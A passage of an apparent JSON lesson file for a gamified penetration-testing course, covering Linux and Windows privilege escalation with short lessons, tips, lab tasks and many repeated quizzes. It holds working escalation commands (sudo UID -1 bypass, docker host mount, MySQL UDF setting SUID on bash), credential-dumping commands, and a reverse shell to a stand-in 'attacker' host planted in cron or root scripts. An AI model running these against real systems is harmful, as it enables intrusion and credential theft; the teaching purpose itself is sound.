frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-sudo-cve","cat":"Privilege Escalation","title":"Sudo CVE-2019-14287","diff":2,"xp":150,"intro":"Bypass sudo user restrictions with UID -1.","sections":[{"type":"text","content":"When sudoers says 'user ALL=(ALL, !root) /bin/bash', specifying UID -1 resolves to root (UID 0) due to an integer handling bug."},{"type":"code","lang":"bash","content":"# Sudoers: user ALL=(ALL, !root) /bin/bash\n# CVE-2019-14287 bypass:\nsudo -u#-1 /bin/bash\n# This resolves UID -1 to 0 (root)"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"CVE-2019-14287 bypasses...","opts":["SUID restrictions","Sudo rules that explicitly exclude root","File permissions","Network ACLs"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-linux-backup-files","cat":"Privilege Escalation","title":"Backup File Exploitation","diff":1,"xp":75,"intro":"Backup files contain credentials and configs.","sections":[{"type":"text","content":"Admins leave .bak, .old, .swp, ~, and .save files with sensitive content."},{"type":"code","lang":"bash","content":"find / -name '*.bak' -o -name '*.old' -o -name '*.save' -o -name '*.swp' 2>/dev/null\nfind / -name '.htpasswd' 2>/dev/null\nfind / -name 'wp-config.php.bak' 2>/dev/null"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Backup files are dangerous because...","opts":["They're encrypted","They often contain the same sensitive data as the original","They're always empty","They're read-only"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-docker-group","cat":"Privilege Escalation","title":"Docker Group to Root","diff":2,"xp":150,"intro":"Docker group membership equals root access.","sections":[{"type":"text","content":"If your user is in the docker group, mount the host root filesystem in a container."},{"type":"code","lang":"bash","content":"id  # check groups\ndocker run -v /:/mnt --rm -it alpine chroot /mnt bash\n# Now you're root on the host"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Docker group equals root because...","opts":["Docker is encrypted","Docker daemon runs as root and can mount host paths","Docker uses VMs","Docker modifies sudoers"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-cron-path","cat":"Privilege Escalation","title":"Cron PATH Hijacking","diff":2,"xp":150,"intro":"Cron uses a limited PATH \u2014 exploit it.","sections":[{"type":"text","content":"Cron's PATH is usually just /usr/bin:/bin. If a cron script calls a command without a full path and a writable directory is in cron's PATH, create a malicious version."},{"type":"code","lang":"bash","content":"cat /etc/crontab  # check PATH\n# If PATH=/home/user/bin:/usr/bin:/bin\n# And cron runs: backup_script\necho '#!/bin/bash\\nbash -i >& /dev/tcp/attacker/4444 0>&1' > /home/user/bin/backup_script\nchmod +x /home/user/bin/backup_script"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Cron PATH hijacking works when...","opts":["Cron uses absolute paths","A writable directory appears before the real binary in PATH","Cron is disabled","The script is read-only"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-writable-scripts","cat":"Privilege Escalation","title":"Writable Root Scripts","diff":1,"xp":75,"intro":"Root scripts you can modify = root code execution.","sections":[{"type":"text","content":"Find scripts running as root (cron, services, startup) that you have write access to."},{"type":"code","lang":"bash","content":"find / -user root -writable -name '*.sh' 2>/dev/null\n# If you find one, add:\nbash -i >& /dev/tcp/attacker/4444 0>&1"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Writable root scripts give you...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-accesschk","cat":"Privilege Escalation","title":"Windows Access Control Enumeration","diff":2,"xp":150,"intro":"Find weak permissions on files, services, and registry.","sections":[{"type":"text","content":"accesschk (Sysinternals) shows effective permissions for any user on files, directories, services, and registry keys."},{"type":"code","lang":"bash","content":"accesschk.exe /accepteula -uwcqv 'Everyone' *\naccesschk.exe /accepteula -uwdqs Users C:\\\naccesschk.exe /accepteula -kqswuv HKLMSYSTEM"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"accesschk finds...","opts":["Passwords","Weak permissions that allow privilege escalation","Network issues","Malware"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-stored-creds","cat":"Privilege Escalation","title":"Windows Stored Credential Exploitation","diff":1,"xp":100,"intro":"Find and use credentials cached by Windows.","sections":[{"type":"text","content":"Windows stores credentials in Credential Manager, WiFi profiles, browser storage, and recently-used credentials. cmdkey lists them."},{"type":"code","lang":"bash","content":"cmdkey /list\nrundll32 keymgr.dll,KRShowKeyMgr\nnetsh wlan show profiles\nnetsh wlan show profile 'WiFi' key=clear"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"cmdkey /list shows...","opts":["Running processes","Stored credentials for services and networks","File permissions","Registry keys"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-linux-mysql-udf","cat":"Privilege Escalation","title":"MySQL UDF Privilege Escalation","diff":3,"xp":200,"intro":"Use User Defined Functions to execute OS commands from MySQL.","sections":[{"type":"text","content":"If MySQL runs as root and you have mysql root access, compile a UDF library that calls system() and execute OS commands through SQL."},{"type":"code","lang":"bash","content":"# Compile UDF\ngcc -g -c raptor_udf2.c && gcc -g -shared -o raptor_udf2.so raptor_udf2.o\nmysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'raptor_udf2.so';\nmysql> SELECT sys_exec('chmod +s /bin/bash');"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"MySQL UDF escalation requires...","opts":["Web access","MySQL root access + MySQL running as OS root","Network access","File permissions"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo 